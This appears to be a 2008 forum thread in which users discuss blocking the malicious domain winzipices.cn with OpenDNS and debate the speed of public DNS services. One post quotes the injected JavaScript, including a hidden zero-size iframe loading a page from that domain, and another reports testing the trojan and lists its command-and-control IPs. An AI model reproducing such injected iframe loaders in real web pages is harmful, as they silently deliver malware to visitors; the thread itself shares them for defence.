Use OpenDNS to block winzipices.cn

[+Mystic MVC]

You just go into your Network adapter settings, click properties, change the DNS server address, reboot your computer.

Thats the simpliest way

If you have a router, change the DNS servers of your router.

Its really easy..

http://www.opendns.com/start

The technology they use is simply amazing.. and it keeps getting better every day. Each day I hear about new improvements or ideas to the backend and frontend of OpenDNS and they are just simply amazing.

I do have a router, but is is connected (like I said above) in a delicate way to the rest of the network. To eliminate a double NAT setup, I currently have my router (Linksys WRT54G) acting as a wireless point (I think is the term) while the modem (SpeedStream 4500) does the routing. Hence, why I am so hesitant to try this.

If I were to try it, it wouldn't have any affect if I did it on an individual computer's DNS, the only way it would do something would be if I changed it on the modem right?

[The_Decryptor Veteran]

No offense but how? How would this be different from using my ISP's? Can't I already block/filter out tons of stuff with my router?

It's probably be slower than your ISP (It's about 20 times slower than my ISP's DNS server)

I just use dnsmasq (on my WRT54GL) myself.

[Litespeed]

"You're already blocking winzipices.cn.

You're blocking Adware sites. This category includes winzipices.cn."

Looks like OpenDNS has already added it to the Adware list.

[DaViD_BRaNDoN]

Anyone from Malaysia uses OpenDNS? How's the performance compared to our local ISP (Streamyx) DNS? How do I go about benchmarking OpenDNS vs local ISP DNS?

[Jonathan Yaniv]

Does anyone have any details on the malware itself? What browsers does it affect? What exactly does the malware do, etc? Or better yet, can someone upload the actual malware someplace?

The script being injected is winzipices.cn / 2.js (added space so people dont accidently go here) - DONT GO THERE, EVEN THOUGH ITS A JS FILE

The stuff in that JS file (2.js) is this:

document.write("<iframe <iframe src=http://winzipices.cn/2.asp width=0 height=0></iframe>")

5.js is this

if (navigator.systemLanguage=='zh-cn')

{

}

else{

document.write("http://winzipices.cn/5.js");

}

document.write ('<script language="javascript" type="text/javascript" src="http://js.users.51.la/1856986.js"></script>');

"You're already blocking winzipices.cn.

You're blocking Adware sites. This category includes winzipices.cn."

Looks like OpenDNS has already added it to the Adware list.

I am a moderator for OpenDNS and i have added it to the Adware category. Thats why.

[Jonathan Yaniv]

I do have a router, but is is connected (like I said above) in a delicate way to the rest of the network. To eliminate a double NAT setup, I currently have my router (Linksys WRT54G) acting as a wireless point (I think is the term) while the modem (SpeedStream 4500) does the routing. Hence, why I am so hesitant to try this.

If I were to try it, it wouldn't have any affect if I did it on an individual computer's DNS, the only way it would do something would be if I changed it on the modem right?

Ahh, this took me a while to figure out. Ok, this makes sense

You are using your WRT54G basically as a DHCP server which uses ad-hoc, the default gateway of your router points to the IP address of your modem. The DNS settings of your router will be the address of your modem. Therefore, if you are able to change the DNS server address of your modem, that would be fine.

But if you dont feel comfortable doing it.. dont.

I dont think it would mess up your setup.

[Jonathan Yaniv]

winzipices.cn isnt the only one :-(

[Steve Gosselin]

winzipices.cn isnt the only one :-(

arfffff :(

[Jonathan Yaniv]

arfffff :(

kisswow.com.cn is another.

[Steve Gosselin]

@Jonathan Yaniv: thanks.

[Fred Derf Veteran]

I set my router to use OpenDNS.

I have used them before but it must have gotten reset at some point (I probably replaced the router at some point).

[ScottKin]

I already use OpenDNS, but as an extra precaution added the listed domains and IP addreses at the SANS site into my router's block-list.

--ScottKin

[Jonathan Yaniv]

I already use OpenDNS, but as an extra precaution added the listed domains and IP addreses at the SANS site into my router's block-list.

--ScottKin

That works too.

I (Personally) just blocked all access to any .cn site.

I cant read that language.. so I have no use for those kinds of sites.

[[deXter]]

@Jonathan:

So, I've visited all the above mentioned sites, and the sites in the google search, and the winzipices site itself, executed all the .js files, created a local html and manually added the scripts and I see nothing happening. I did this on a windows 2003 machine on an admin account on IE 6 with its security and privacy settings resetted to the lowest level, without any antivirus, firewall, antispyware, adblocker, DEP, etc.

Scanned my PC but no trojans were found, confirmed this with procmon, procexp, autoruns and rootkitrevealer.

So is there a bug in this bug or am I missing something?

---

Can someone confirm this in their VM, if they're able to get to the actual trojan?

--

Edit: Managed to manually find the links to the actual malware. Seems one needs to have realplayer installed for it to download and execute automatically. Tested the actual malware- it's a trojan that receives and executes instructions via a config file. At this point of time, it didn't seem to perform any malicious commands as the config file didn't contain any. It just downloaded a second file which makes requests to 61.134.37.15:1800.

I'll get RP later and see if I can manage to get the trojan to auto-execute.

--

Btw, I highly recommend blocking 61.134.37.15 and 61.188.38.158 , in addition to winzipices.cn

A good news for AV users is that the majority of them have already added this to their database- except McAfee, Avast and ClamAV.

http://www.virustotal.com/analisis/4e5fead...dea811ea5e41d0b

Edited May 10, 2008 by [deXter]

[Jonathan Yaniv]

@Jonathan:

So, I've visited all the above mentioned sites, and the sites in the google search, and the winzipices site itself, executed all the .js files, created a local html and manually added the scripts and I see nothing happening. I did this on a windows 2003 machine on an admin account on IE 6 with its security and privacy settings resetted to the lowest level, without any antivirus, firewall, antispyware, adblocker, DEP, etc.

Scanned my PC but no trojans were found, confirmed this with procmon, procexp, autoruns and rootkitrevealer.

So is there a bug in this bug or am I missing something?

---

Can someone confirm this in their VM, if they're able to get to the actual trojan?

--

Edit: Managed to find the links to the actual malware. Seems one needs to have realplayer installed for it to run/execute automatically.

Interesting..

I havent personally tested it, as i dont want to get the malware, lol.

[fhpuqrgrpgvirzhpujbj]

Added to Avast... I think

[episode]

Sure, but if you are like I am, and have a home network, then this is sort of a one-stop-does-all type of fix, rather than going to several PCs and making changes.

In which case, any router worth its salt will also do it.

[Randolph]

I don't mean to thread hi-jack...but I want to give this OpenDNS thing a try. What differences will I notice and how do they keep it free is my main questions? Sounds interesting. :)

[[deXter]]

@Tem, and others:

You can also use DNS Advantage and ScrubIT.

The basic advantages are:

- Faster browsing

- Site blocking, independent of OS/software

- Content blocking (pornography, etc)

- Automatic protection against phishing

- Automatically fix typos in website names: Eg: Typing yaho.com or gppgle.com will lead you to their correct domains

These public DNS services are free, and generally will continue to remain free.

I personally prefer DNS Advantage as it has many servers worldwide, and particularly, they have a server located very close to where I live.

[Jonathan Yaniv]

I don't mean to thread hi-jack...but I want to give this OpenDNS thing a try. What differences will I notice and how do they keep it free is my main questions? Sounds interesting. :)

Difference in page / site load time due to its very large DNS cache

More secure.. you can block adware category, so no more adware sites will ever load.. a malware category is coming soon btw.

Block porn sites too.

Block suspicious responses

Typo corrections

Network shortcuts

OpenDNS keeps it free cause they get revenue from the ads they have from Overture running on the guide / search pages.

Also, they do have paid features, for business who need extra features, but OpenDNS cant provide those for free. and i mean the really big businesses.

@Tem, and others:

You can also use DNS Advantage and ScrubIT.

The basic advantages are:

- Faster browsing

- Site blocking, independent of OS/software

- Content blocking (pornography, etc)

- Automatic protection against phishing

- Automatically fix typos in website names: Eg: Typing yaho.com or gppgle.com will lead you to their correct domains

These public DNS services are free, and generally will continue to remain free.

I personally prefer DNS Advantage as it has many servers worldwide, and particularly, they have a server located very close to where I live.

DNS Advantage is like a cheap knockoff of OpenDNS, they even use the same terminology "dashboard"

[The_Decryptor Veteran]

I haven't heard one explanation about making sites load faster, I've just heard the claim repeated.

[Jonathan Yaniv]

I haven't heard one explanation about making sites load faster, I've just heard the claim repeated.

OpenDNS has servers situated strategically at the most well-connected intersections of the Internet. Unlike your ISP, our network uses Anycast routing technology, which means no matter where you are in the world your DNS requests are answered by our closest datacenter. Anycast routing also means that you are automatically routed to our next closest datacenter in the event of maintenance or downtime. This makes your Internet faster and more reliable.

How we're faster: We have really large caches

Most DNS servers have a small cache. We operate the largest caches in the world (and on the Internet, size matters). This means when you type a website into your address bar, the site loads immediately, instead of making you wait for a small cache to find the answer.

[The_Decryptor Veteran]

my ISP's DNS server is one hop away and can return uncached entries in around 10ms. That's still not going to make my connection faster though.

And OpenDNS caches are going to expire at the same time as my ISP's caches, unless OpenDNS is ignoring the TTL.

[[deXter]]

DNS Advantage is like a cheap knockoff of OpenDNS, they even use the same terminology "dashboard"

Maybe, but that doesn't change the fact that they're way faster than OpenDNS (for me). I'm quite surprised that despite being around for so many years, they have such few servers (5, 1 upcoming), while DNS Advantage has so many (14, 3 upcoming).

--

Also, I fail to see how OpenDNS's servers are "situated strategically", considering the fact that most of them ('cept one) are located in the US -_-

In any case, a little bit of competition never harmed anyone :)

Edited May 10, 2008 by [deXter]

[Fred Derf Veteran]

I notice zero speed improvement.